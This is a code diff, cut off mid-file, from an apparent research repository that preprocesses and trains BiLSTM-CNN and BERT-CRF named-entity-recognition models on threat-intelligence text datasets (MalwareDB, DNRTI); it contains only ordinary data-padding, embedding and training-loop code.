+ train_case_sentence_padding = sentence_padding(train_text2ids[4], sent_maxlen, case2idx['[PAD]'])
128
+ # pad the char_id_sentence
129
+ train_char_sentences_padding = char_sentences_padding(train_text2ids[1], sent_maxlen, word_maxlen)
130
+ # train_char_sentences_padding = torch.tensor(train_char_sentences_padding, dtype=torch.long)
131
+
132
+ train_id_pad_dict = dict(train_wordids_pad=train_word_sentence_padding,
133
+ train_charids_pad=train_char_sentences_padding,
134
+ train_labelids_pad=train_label_sentence_padding,
135
+ train_posids_pad=train_pos_sentence_padding,
136
+ train_caseids_pad=train_case_sentence_padding
137
+ )
138
+
139
+ with open('Result/Data/MalwareDB/train_id_pad_dict.pickle', 'wb') as file:
140
+ pickle.dump(train_id_pad_dict, file) # can be used for train and pos_emb
141
+
142
+ # pad the_word_id, label_id, pos_id, and case_id of valid_sentence
143
+ valid_word_sentence_padding = sentence_padding(valid_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
144
+ # valid_word_sentence_padding = torch.tensor(valid_word_sentence_padding, dtype=torch.long)
145
+ valid_label_sentence_padding = sentence_padding(valid_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
146
+ valid_pos_sentence_padding = sentence_padding(valid_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
147
+ valid_case_sentence_padding = sentence_padding(valid_text2ids[4], sent_maxlen, case2idx['[PAD]'])
148
+ # pad the char_id_sentence
149
+ valid_char_sentences_padding = char_sentences_padding(valid_text2ids[1], sent_maxlen, word_maxlen)
150
+ # valid_char_sentences_padding = torch.tensor(valid_char_sentences_padding, dtype=torch.long)
151
+
152
+ valid_id_pad_dict = dict(valid_wordids_pad=valid_word_sentence_padding,
153
+ valid_charids_pad=valid_char_sentences_padding,
154
+ valid_labelids_pad=valid_label_sentence_padding,
155
+ valid_posids_pad=valid_pos_sentence_padding,
156
+ valid_caseids_pad=valid_case_sentence_padding
157
+ )
158
+
159
+ with open('Result/Data/MalwareDB/valid_id_pad_dict.pickle', 'wb') as file:
160
+ pickle.dump(valid_id_pad_dict, file) # can be used for validation and pos_emb
161
+
162
+ # pad the_word_id, label_id, pos_id, and case_id of test_sentence
163
+ test_word_sentence_padding = sentence_padding(test_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
164
+ # test_word_sentence_padding = torch.tensor(test_word_sentence_padding, dtype=torch.long)
165
+ test_label_sentence_padding = sentence_padding(test_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
166
+ test_pos_sentence_padding = sentence_padding(test_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
167
+ test_case_sentence_padding = sentence_padding(test_text2ids[4], sent_maxlen, case2idx['[PAD]'])
168
+ # pad the char_id_sentence
169
+ test_char_sentences_padding = char_sentences_padding(test_text2ids[1], sent_maxlen, word_maxlen)
170
+ # test_char_sentences_padding = torch.tensor(test_char_sentences_padding, dtype=torch.long)
171
+
172
+ test_id_pad_dict = dict(test_wordids_pad=test_word_sentence_padding,
173
+ test_charids_pad=test_char_sentences_padding,
174
+ test_labelids_pad=test_label_sentence_padding,
175
+ test_posids_pad=test_pos_sentence_padding,
176
+ test_caseids_pad=test_case_sentence_padding
177
+ )
178
+
179
+ with open('Result/Data/MalwareDB/test_id_pad_dict.pickle', 'wb') as file:
180
+ pickle.dump(test_id_pad_dict, file) # can be used for test and pos_emb
181
+
182
+ # get all the feature_tables
183
+ np.save('Result/Embedding/MalwareDB/case_embedding.npy', case_emb)
184
+ # case_emb_table = torch.tensor(case_emb, dtype=torch.float32)
185
+ # pos_emb_table = torch.tensor(build_pos_emb_table(), dtype=torch.float32)
186
+ np.save('Result/Embedding/MalwareDB/char_embedding.npy', build_char_emb_table(build_vocab_result[3]))
187
+ # char_emb_table = torch.tensor(build_char_emb_table(build_vocab_result[3]), dtype=torch.float32)
188
+
189
+ glove = GloveFeature('Result/Embedding/glove.6B.50d.txt') # 该地址后续可能会变
190
+ glove_embedding_dict = glove.load_glove_embedding()
191
+ word_emb_table = build_word_emb_table(build_vocab_result[1], glove_embedding_dict, glove.glove_dim)
192
+ np.save('Result/Embedding/MalwareDB/word_embedding.npy', word_emb_table)
193
+ # word_emb_table = torch.tensor(word_emb_table, dtype=torch.float32)
data/raw/DNRTI/data_utils.py ADDED
@@ -0,0 +1,424 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/8/13 下午5:21
4
+ # @Author : PeiP Liu
5
+ # @FileName: data_utils.py
6
+ # @Software: PyCharm
7
+
8
+ import os
9
+ from collections import Counter
10
+ import numpy as np
11
+ from numpy import random
12
+ import stanza
13
+ # import nltk
14
+ # rf https://stanfordnlp.github.io/stanza/pos.html
15
+
16
+
17
+ def processing_orgdata(mode):
18
+ """
19
+ read the word from file, and build sentence. every line contains a word and it's tag.
20
+ every sentence is splitted by an empty line.
21
+ :param mode: the data will be used for which mode
22
+ :return:
23
+ """
24
+ sentences = []
25
+ sentences_labels = []
26
+ sentences_pos = []
27
+ str_sentences = []
28
+
29
+ sent_maxlen = 0
30
+ word_maxlen = 0
31
+
32
+ sentence = []
33
+ sentence_label = []
34
+ str_sent = ''
35
+
36
+ data_dir = 'MalwareDB/MalwareDB/'
37
+ file_list = ['train.txt', 'valid.txt', 'test.txt']
38
+ if mode == 'train':
39
+ file_read = open(os.path.join(data_dir, file_list[0]), 'r')
40
+ elif mode == 'valid':
41
+ file_read = open(os.path.join(data_dir, file_list[1]), 'r')
42
+ else:
43
+ file_read = open(os.path.join(data_dir, file_list[2]), 'r')
44
+
45
+ # this is used for the pos_tag
46
+ nlp = stanza.Pipeline('en', processors='tokenize,pos')
47
+
48
+ for line in file_read:
49
+ line = line.strip()
50
+ if line == '':
51
+ if not sentence:
52
+ continue
53
+ # parser pos_tag for every word
54
+ sentence_pos = []
55
+ doc = nlp(str_sent)
56
+ for sent in doc.sentences:
57
+ for word in sent.words:
58
+ sentence_pos.append(word.pos)
59
+ # following is the case of nltk, its return is like [('This', 'DT'), ('is', 'VBZ'), ('my', 'PRP$'),...]
60
+ # token_sent = nltk.word_tokenize(str_sent)
61
+ # sentence_pos = nltk.pos_tag(token_sent)
62
+ sentences_pos.append(sentence_pos)
63
+
64
+ sent_maxlen = max(len(sentence), sent_maxlen)
65
+
66
+ assert len(sentence_label) == len(sentence)
67
+ sentences.append(sentence)
68
+ sentences_labels.append(sentence_label)
69
+ str_sentences.append(str_sent)
70
+
71
+ sentence = []
72
+ sentence_label = []
73
+ str_sent = ''
74
+ else:
75
+ word_label = line.split()
76
+ if len(word_label) != 2:
77
+ continue
78
+ sentence.append(word_label[0]) # a list which is a orig sentence
79
+ sentence_label.append(word_label[1]) # the label list corresponding to orig sentence
80
+ word_maxlen = max(word_maxlen, len(str(word_label[0])))
81
+ str_sent = str_sent + ' ' + str(word_label[0])
82
+
83
+ num_sentence = len(sentences)
84
+ print("The mode is : {}".format(mode))
85
+ print("sent max length is {}".format(sent_maxlen))
86
+ print("word max length is %d" % word_maxlen)
87
+ print('num of sentences is ', num_sentence)
88
+ return sentences, sentences_labels, sentences_pos, str_sentences, sent_maxlen, word_maxlen, num_sentence
89
+
90
+
91
+ def build_vocab(sentences, sentences_labels, sentences_pos): # 这里的输入信息都是train+valid+test
92
+
93
+ word_list = []
94
+ char_list = []
95
+ label_list = []
96
+ pos_list = []
97
+ for i_sent in range(len(sentences)):
98
+ for j_word in range(len(sentences[i_sent])):
99
+ word_list.append(sentences[i_sent][j_word].strip()) # all the words in dict can also be lower
100
+ label_list.append(sentences_labels[i_sent][j_word])
101
+ pos_list.append(sentences_pos[i_sent][j_word])
102
+ for char in sentences[i_sent][j_word]:
103
+ char_list.append(char)
104
+
105
+ # word_set = list(set(word_list))
106
+ word_counter = Counter(word_list)
107
+ word_set = [word[0] for word in word_counter.most_common() if word[1] >= 2] # make sure the number of word>=2
108
+ print("The word set is ", word_set)
109
+ word2index = {each_word: word_index+2 for word_index, each_word in enumerate(word_set)}
110
+ word2index['[PAD]'] = 0; word2index['[UNK]'] = 1
111
+ index2word = {word_index: each_word for each_word, word_index in word2index.items()}
112
+
113
+ char_counter = Counter(char_list)
114
+ char_set = [char[0] for char in char_counter.most_common() if char[1] >= 2] # make sure the number of char>=2
115
+ print("The char set is ", char_set)
116
+ char2index = {each_char: char_index+2 for char_index, each_char in enumerate(char_set)}
117
+ char2index['[CPAD]'] = 0; char2index['[CUNK]'] = 1
118
+ index2char = {char_index: each_char for each_char, char_index in char2index.items()}
119
+
120
+ label_counter = Counter(label_list)
121
+ label_set = [label_item[0] for label_item in label_counter.most_common()]
122
+ print("The label set is ",label_set)
123
+ label2index = {each_label: label_index + 3 for label_index, each_label in enumerate(label_set)}
124
+ label2index['[BOS]'] = 0; label2index['[EOS]'] = 1; label2index['[X]'] = 2
125
+ index2label = {label_index: each_label for each_label, label_index in label2index.items()}
126
+
127
+ pos_set = list(set(pos_list))
128
+ print('The pos set is ', pos_set)
129
+ pos2index = {pos : id+1 for id, pos in enumerate(pos_set)}
130
+ pos2index['[PPAD]'] = 0
131
+ index2pos = {id:pos for pos, id in pos2index.items()}
132
+ return word2index, index2word, char2index, index2char, label2index, index2label, pos2index, index2pos
133
+
134
+
135
+ def case_feature():
136
+ case2idx = {'allNum':0, 'allLower':1, 'allUpper':2, "upperInit":3, 'other':4, 'main_num':5, 'contain_num':6, '[PAD]':7}
137
+ case_emb = np.identity(len(case2idx), dtype='float32')
138
+ return case2idx, case_emb
139
+
140
+
141
+ def get_token_case(token, case2idx): # 组成token的字符形态学特征
142
+ num_digits = 0
143
+ for char in token.strip(): # 加上前后处理,防止之前的处理不完全
144
+ if char.isdigit():
145
+ num_digits = num_digits + 1
146
+ digit_prop = num_digits / float(len(token))
147
+
148
+ casing = 'other'
149
+ if token.isdigit():
150
+ casing = 'allNum'
151
+ elif digit_prop > 0.5:
152
+ casing = 'main_num'
153
+ elif token.islower():
154
+ casing = 'allLower'
155
+ elif token.isupper():
156
+ casing = 'allUpper'
157
+ elif token.istitle():
158
+ casing = 'upperInit'
159
+ elif num_digits > 0:
160
+ casing = 'contain_num'
161
+
162
+ return case2idx[casing]
163
+
164
+
165
+ def text2ids(sentences, sentences_labels, sentences_pos, word2index, char2index, label2index, pos2index, case2idx):# 这里的输入信息分别是train、valid、test等
166
+ sents_wordids = []
167
+ sents_charids = []
168
+ sents_labels_ids = []
169
+ sents_posids = []
170
+ sents_caseids = []
171
+
172
+ for sent_iter, sent in enumerate(sentences):
173
+ word_ids = [] # convert the sentence to token_id
174
+ char_ids = [] # convert the sentence to char_id
175
+ label_ids = [] # convert the sentence_label to label_id
176
+ pos_ids = [] # convert the sentence_pos to pos_id
177
+ case_ids = [] # get the morphology_id
178
+ for word_iter, word in enumerate(sent):
179
+ if word in word2index:
180
+ wordid = word2index[word]
181
+ elif word.lower() in word2index:
182
+ wordid = word2index[word.lower()] # use the lower of the word
183
+ else:
184
+ wordid = word2index['[UNK]'] # the low frequency words and OOV
185
+
186
+ charid = [] # the chars of a word
187
+ for char in word:
188
+ if char not in char2index:
189
+ charid.append(char2index['[CUNK]']) # the low frequency chars and OOV
190
+ else:
191
+ charid.append(char2index[char])
192
+
193
+ word_ids.append(wordid)
194
+ char_ids.append(charid)
195
+ label_ids.append(label2index[sentences_labels[sent_iter][word_iter]])
196
+ pos_ids.append(pos2index[sentences_pos[sent_iter][word_iter]])
197
+ case_ids.append(get_token_case(word, case2idx))
198
+
199
+ sents_wordids.append(word_ids)
200
+ sents_charids.append(char_ids)
201
+ sents_labels_ids.append(label_ids)
202
+ sents_posids.append(pos_ids)
203
+ sents_caseids.append(case_ids)
204
+
205
+ return sents_wordids, sents_charids, sents_labels_ids, sents_posids, sents_caseids
206
+
207
+
208
+ def sentence_padding(sentences, sent_maxlen, padding_value): # 这里,每个句子中的词已经转换成了词索引
209
+ padded = []
210
+ actual_len = []
211
+ for sent in sentences:
212
+ if len(sent) < sent_maxlen:
213
+ padded.append(sent + [padding_value] * (sent_maxlen-len(sent)))
214
+ # np.pad(sent,pad_width=(0, sent_maxlen-len(x)),mode='constant',constant_values=padding_value)
215
+ actual_len.append(len(sent))
216
+ else:
217
+ padded.append(sent[:sent_maxlen])
218
+ actual_len.append(sent_maxlen)
219
+ return padded
220
+ # return np.array(padded), actual_len
221
+
222
+
223
+ def char_sentences_padding(sents_charids, sent_maxlen, word_maxlen): # padding_value是char2index['[CPAD]'] = 0
224
+ pad_char_sentences = []
225
+ for sent in sents_charids:
226
+ sent_char_pad = np.zeros([sent_maxlen, word_maxlen], dtype = np.int32) # 表示一个句子
227
+ sc_pad = [] # one sequence
228
+ for word in sent: # a sequence of char_id from char2indx
229
+ char_pad = np.zeros([word_maxlen], dtype=np.int32) # on word
230
+ if len(word) <= word_maxlen:
231
+ char_pad[:len(word)] = word
232
+ else:
233
+ char_pad = word[:word_maxlen]
234
+ # char_pad = word[:word_maxlen] + [padding_value] * max(word_maxlen - len(word), 0)
235
+
236
+ sc_pad.append(char_pad) # a list of char_id for a sentence
237
+
238
+ for i in range(len(sc_pad)):
239
+ sent_char_pad[i, :len(sc_pad[i])] = sc_pad[i] # post padding
240
+ # sent_char_pad[sent_maxlen-len(sc_pad)+i, :len(sc_pad[i])] = sc_pad[i] # trunte padding
241
+
242
+ pad_char_sentences.append(sent_char_pad) # the list of padded sentences
243
+
244
+ return pad_char_sentences
245
+ # return np.array(pad_char_sentences) # numpy array
246
+
247
+
248
+ def build_word_emb_table(index2word, glove_embed_dict, word_embed_dim):
249
+ scale = np.sqrt(3.0 / word_embed_dim)
250
+ word_emb_table = np.empty([len(index2word), word_embed_dim], dtype=np.float32)
251
+ word_emb_table[:2, :] = np.random.uniform(-scale, scale, [2, word_embed_dim]) # UNK and PAD
252
+ for index, word in index2word.items():
253
+ if word in glove_embed_dict:
254
+ word_emb = glove_embed_dict[word]
255
+ elif word.lower() in glove_embed_dict:
256
+ word_emb = glove_embed_dict[word.lower()]
257
+ else:
258
+ word_emb = np.random.uniform(-scale, scale, [1, word_embed_dim])
259
+ word_emb_table[index, :] = word_emb
260
+ return word_emb_table
261
+
262
+
263
+ def build_char_emb_table(index2char, char_embed_dim=30):
264
+ scale = np.sqrt(3.0/char_embed_dim)
265
+ char_emb_table = np.random.uniform(-scale, scale, [len(index2char), char_embed_dim]).astype(np.float32)
266
+ return char_emb_table
267
+
268
+
269
+ def build_pos_emb_table():
270
+ pos_emb_table = np.load('Result/PosEmbedding/MalwareDB/pos_embedding.npy')
271
+ return pos_emb_table
272
+
273
+ '''
274
+ def split_wordlabelpos(input_sentences):# [[['This', 'B-PER', 'NN'], ...],...]
275
+ sent_word = [[word[0] for word in sent] for sent in input_sentences] # [['this','is','a','test'],...]
276
+ sent_label = [[word[1] for word in sent] for sent in input_sentences] # it is like the former, but only by 'B-PER'
277
+ sent_pos = [[word[2] for word in sent] for sent in input_sentences]
278
+ return [sent_word, sent_label, sent_pos]
279
+
280
+ def word2charlist(char2index, index2word): ######## 后面要注意填充词和未登录词 ##########
281
+ word2charids = {}
282
+ for ind, word in index2word.items():
283
+ char_ids = []
284
+ for char in word:
285
+ if char in char2index.keys():
286
+ char_ids = char_ids + [char2index[char]]
287
+ else:
288
+ char_ids = char_ids + [char2index['[CUNK]']]
289
+ word2charids[ind] = char_ids
290
+ return word2charids # 返回值是{词索引:字符索引列表}的形式
291
+
292
+ def word_padding(word2charids, word_maxlen, padding_value): # 输入形式是{词索引:字符索引列表}
293
+ word_padded = dict()
294
+ word_actuallen = dict()
295
+ for word_idx, charids_list in word2charids.items():
296
+ charids_list_ = charids_list[:word_maxlen] + [padding_value] * max(word_maxlen-len(charids_list), 0)
297
+ word_padded[word_idx] = charids_list_
298
+ word_actuallen[word_idx] = min(len(charids_list), word_maxlen)
299
+ return word_padded, word_actuallen # 输出是{词索引:扩充后的字符索引列表},{词索引:实际包含的字符数量}
300
+
301
+ def get_batch(dataset, batch_size, shuffle=False):
302
+ data_size = len(dataset)
303
+ num_batch = int((data_size-1) / batch_size) + 1
304
+ if shuffle:
305
+ indices = np.random.permutation(np.arange(data_size))
306
+ data_shuffle = np.array(dataset)[indices]
307
+ else:
308
+ data_shuffle = np.array(dataset)
309
+
310
+ for i_batch in num_batch:
311
+ start_id = i_batch * batch_size
312
+ end_id = min((i_batch + 1) * batch_size, data_size)
313
+ yield data_shuffle[start_id:end_id]
314
+ '''
315
+
316
+
317
+ def gen_batch_data(sents, labels, bert_sents, bert_labels, num_sentence, batch_size):
318
+ word_sentences = np.array(sents[0]) # wordids_pad
319
+ char_sentences = np.array(sents[1]) # charids_pad
320
+ pos_sentences = np.array(sents[2])
321
+ case_sentences = np.array(sents[3])
322
+ labels_sentences = np.array(labels)
323
+
324
+ bert_sents = np.array(bert_sents)
325
+ bert_labels = np.array(bert_labels)
326
+
327
+ data_idx = np.arange(num_sentence)
328
+ random.shuffle(data_idx)
329
+
330
+ i = 0
331
+ while True:
332
+ if i + batch_size >= num_sentence:
333
+ batch_inx = data_idx[i:]
334
+ batch_word_sentences = word_sentences[batch_inx]
335
+ batch_char_sentences = char_sentences[batch_inx]
336
+ batch_pos_sentencens = pos_sentences[batch_inx]
337
+ batch_case_sentences = case_sentences[batch_inx]
338
+ batch_labels_sentences = labels_sentences[batch_inx]
339
+
340
+ batch_bert_sents = bert_sents[batch_inx]
341
+ batch_bert_labels = bert_labels[batch_inx]
342
+
343
+ yield (batch_word_sentences, batch_char_sentences, batch_pos_sentencens, batch_case_sentences), \
344
+ batch_labels_sentences, batch_bert_sents, batch_bert_labels
345
+ break
346
+ else:
347
+ batch_inx = data_idx[i: i+batch_size]
348
+ batch_word_sentences = word_sentences[batch_inx]
349
+ batch_char_sentences = char_sentences[batch_inx]
350
+ batch_pos_sentencens = pos_sentences[batch_inx]
351
+ batch_case_sentences = case_sentences[batch_inx]
352
+ batch_labels_sentences = labels_sentences[batch_inx]
353
+
354
+ batch_bert_sents = bert_sents[batch_inx]
355
+ batch_bert_labels = bert_labels[batch_inx]
356
+
357
+ yield (batch_word_sentences, batch_char_sentences, batch_pos_sentencens, batch_case_sentences), \
358
+ batch_labels_sentences, batch_bert_sents, batch_bert_labels
359
+ i = i + batch_size
360
+
361
+
362
+ class DataLoader:
363
+ def __init__(self, input_data, labels):
364
+ self.input_data = input_data
365
+ self.labels = labels
366
+ self.num_data = len(input_data)
367
+ self.indexes = np.arange(self.num_data)
368
+
369
+ def get_batch(self, batch_size, shuffle = True):
370
+ if shuffle:
371
+ np.random.shuffle(self.indexes)
372
+
373
+ iter = 0
374
+ while True:
375
+ if iter + batch_size >= self.num_data:
376
+ yield self.input_data[self.indexes[iter:]], self.labels[self.indexes[iter:]]
377
+ break
378
+ else:
379
+ yield self.input_data[self.indexes[iter:iter+batch_size]], self.labels[self.indexes[iter:iter+batch_size]]
380
+ iter = iter + batch_size
381
+
382
+ def __len__(self):
383
+ return self.num_data
384
+
385
+
386
+ class GloveFeature:
387
+ def __init__(self, glove_path):
388
+ self.glove_path = glove_path
389
+ self.glove_token2inx, self.glove_dim = self.glove_vocab()
390
+
391
+ def glove_vocab(self):
392
+ vocab = set()
393
+ embed_dim = -1
394
+ with open(self.glove_path, 'r') as file_read:
395
+ for line in file_read:
396
+ line = line.strip()
397
+ if len(line) == 0:
398
+ continue
399
+ tokens = line.split(' ')
400
+ if embed_dim < 0:
401
+ embed_dim = len(tokens) - 1
402
+ else:
403
+ assert (embed_dim + 1 == len(tokens))
404
+ word = tokens[0]
405
+ vocab.add(word)
406
+ print('glove vocab done. {} tokens'.format(len(vocab)))
407
+ glove_token2inx = {token: ind for ind, token in enumerate(vocab)}
408
+ return glove_token2inx, embed_dim
409
+
410
+ def load_glove_embedding(self):
411
+ file_read = open(self.glove_path, 'r')
412
+ # glove_embeddings = np.random.random([len(self.glove_token2inx), self.glove_dim])
413
+ embedding_dict = dict()
414
+ for line in file_read:
415
+ line = line.strip()
416
+ if len(line) == 0:
417
+ continue
418
+ line = line.split(' ')
419
+ word = line[0]
420
+ embedding = [float(x) for x in line[1:]]
421
+ embedding_dict[word] = np.array(embedding)
422
+
423
+ return embedding_dict
424
+
data/raw/DNRTI/main.py ADDED
@@ -0,0 +1,276 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/9/11 下午4:28
4
+ # @Author : PeiP Liu
5
+ # @FileName: main.py
6
+ # @Software: PyCharm
7
+
8
+ import os
9
+ import torch
10
+ import pickle
11
+ import torch.nn as nn
12
+ import numpy as np
13
+ import time
14
+ import seaborn as sns
15
+ import matplotlib.pyplot as plt
16
+ from tqdm import trange
17
+ import torch.optim as optim
18
+ from torch.utils.tensorboard import SummaryWriter
19
+ from arguments import BilstmCnnArgs as args
20
+ from arguments import BertArgs as bert_args
21
+ from BiLSTM_CNN.model import build_model
22
+ from data_utils import gen_batch_data
23
+ from Finetuning_BertCRF.Bert_Feature import GetBertFeature
24
+ from common_modules.model_evaluation import lc_cal_f1, lc_cal_acc
25
+ from common_modules.utils import EarlyStopping
26
+ from Finetuning_BertCRF.BertModel import BERT_CRF_NER
27
+
28
+ os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
29
+ os.environ['CUDA_VISIBLE_DEVICES'] = '1'
30
+
31
+ if __name__ == "__main__":
32
+ if not os.path.exists(args.output_dir):
33
+ os.makedirs(args.output_dir)
34
+
35
+ train_sents = (args.train_wordids_pad, args.train_charids_pad, args.train_posids_pad, args.train_caseids_pad)
36
+ train_labels = args.train_labelids_pad
37
+
38
+ valid_sents = (args.valid_wordids_pad, args.valid_charids_pad, args.valid_posids_pad, args.valid_caseids_pad)
39
+ valid_labels = args.valid_labelids_pad
40
+
41
+ test_sents = (args.test_wordids_pad, args.test_charids_pad, args.test_posids_pad, args.test_caseids_pad)
42
+ test_labels = args.test_labelids_pad
43
+
44
+ bert_train_sents = bert_args.train_seq_list
45
+ bert_train_labels = bert_args.train_seq_label_list
46
+
47
+ bert_valid_sents = bert_args.valid_seq_list
48
+ bert_valid_labels = bert_args.valid_seq_label_list
49
+
50
+ bert_test_sents = bert_args.test_seq_list
51
+ bert_test_labels = bert_args.test_seq_label_list
52
+
53
+ word2indx = args.word2idx
54
+ label2idx = args.label2idx
55
+
56
+ writer = SummaryWriter(log_dir=args.output_dir, comment='scalar_record')
57
+ early_stop = EarlyStopping(monitor='valid-f1', min_delta=args.min_delta, patience=args.patience)
58
+
59
+ # model = build_model('multi_feature_bilstm_atten_crf', args).to(args.device) # 不可行
60
+ # model = build_model('transformer_crf', args).to(args.device) # 可行
61
+ model = build_model('bilstm_multihead_atten_crf', args).to(args.device) # 可行
62
+ # model = build_model('bilstm_atten_crf', args).to(args.device) # 稍微有效
63
+ bert_emission = GetBertFeature(args.device)
64
+
65
+ optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)
66
+ # rf https://pytorch.org/docs/stable/generated/torch.optim.lr_scheduler.ReduceLROnPlateau.html
67
+ lr_decay = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=args.lr_decay_factor,
68
+ verbose=True, patience=3, min_lr=args.min_lr)
69
+
70
+ """
71
+ if all(map(os.path.exists, 'Result/Embedding/word_embedding.npy')):
72
+ pretrained_embedding = np.load('Result/Embedding/word_embedding.npy')
73
+ model.init_embedding(pretrained_embedding)
74
+ """
75
+ print("*****************************Starting Training*****************************")
76
+ num_batch = args.num_train // args.batch_size if args.num_train % args.batch_size==0 else args.num_train//args.batch_size+1
77
+ valid_f1_prev = 0
78
+
79
+ # record the training infor
80
+ train_ave_loss = []
81
+ valid_acc_score = []
82
+ valid_f1_score = []
83
+ valid_loss_score = []
84
+
85
+ # x_epoch = 0
86
+ for epoch in trange(args.total_train_epoch, desc='Epoch'):
87
+ train_loss = 0
88
+
89
+ # compute the training time, and initiate the time
90
+ train_start = time.time()
91
+ batch_start = time.time()
92
+
93
+ # setting the training mode and clear the grad
94
+ model.train()
95
+ model.zero_grad()
96
+ for i_batch, (batch_train_sents, batch_train_labels, batch_bert_train_sents, batch_bert_train_labels) in \
97
+ enumerate(gen_batch_data(train_sents, train_labels, bert_train_sents, bert_train_labels, args.num_train, args.batch_size)):
98
+
99
+ # remove the data to device(GPU)
100
+ i_batch_train_word_sentences = torch.from_numpy(batch_train_sents[0]).long().to(args.device)
101
+ i_batch_train_char_sentences = torch.from_numpy(batch_train_sents[1]).long().to(args.device)
102
+ i_batch_train_pos_sentencens = torch.from_numpy(batch_train_sents[2]).long().to(args.device)
103
+ i_batch_train_case_sentences = torch.from_numpy(batch_train_sents[3]).long().to(args.device)
104
+ i_batch_train_labels = torch.from_numpy(batch_train_labels).long().to(args.device)
105
+
106
+ # bert feature
107
+ i_batch_bert_train_sents = batch_bert_train_sents.tolist()
108
+ i_batch_bert_train_labels = batch_bert_train_labels.tolist()
109
+ i_batch_bert_train_feature = bert_emission.get_bert_feature(i_batch_bert_train_sents, i_batch_bert_train_labels, args.device)
110
+
111
+ i_batch_train_loss = model(i_batch_train_char_sentences, i_batch_train_word_sentences, i_batch_train_pos_sentencens, i_batch_train_case_sentences, i_batch_train_labels, 'train', i_batch_bert_train_feature)
112
+
113
+ # backpropagation and clear the grad
114
+ i_batch_train_loss.backward()
115
+ train_loss = train_loss + i_batch_train_loss.cpu().item()
116
+ optimizer.step()
117
+ optimizer.zero_grad()
118
+
119
+ # compute the training time
120
+ if i_batch % 10 == 0 and i_batch != 0:
121
+ print('Ten batches cost time : {}'.format(time.time()-batch_start))
122
+ # print the training infor
123
+ print("Epoch:{}-{}/{}, Loss:{}".format(epoch, i_batch, num_batch, i_batch_train_loss))
124
+ batch_start = time.time()
125
+ writer.add_scalar("train_loss", i_batch_train_loss.cpu().item(), epoch*num_batch+i_batch)
126
+
127
+ ave_loss = train_loss/num_batch # the average loss of each epoch
128
+ train_ave_loss.append(ave_loss)
129
+ print("Epoch: {} is completed, the average train_loss is: {}, spend: {}".format(epoch,ave_loss,time.time()-train_start))
130
+ print("********************Let us begin the validation of epoch {}***************************".format(epoch))
131
+
132
+ # we save the model
133
+ # torch.save(model.state_dict(), os.path.join(args.output_dir, 'ckpt_epoch_{:2d}.pt'.format(epoch)))
134
+ # if os.path.exists(os.path.join(args.output_dir, 'ckpt_epoch_{:2d}.pt'.format(epoch-args.patience-1))):
135
+ # os.remove(os.path.join(args.output_dir, 'ckpt_epoch_{:2d}.pt'.format(epoch-args.patience-1)))
136
+
137
+ # evaluate the model
138
+ model.eval()
139
+ valid_true, valid_pre = [], []
140
+ valid_acml_loss = 0
141
+ for j_batch, (batch_valid_sents, batch_valid_labels, batch_bert_valid_sents, batch_bert_valid_labels) in \
142
+ enumerate(gen_batch_data(valid_sents, valid_labels, bert_valid_sents, bert_valid_labels, args.num_valid, args.batch_size)):
143
+
144
+ # remove the data to device(GPU)
145
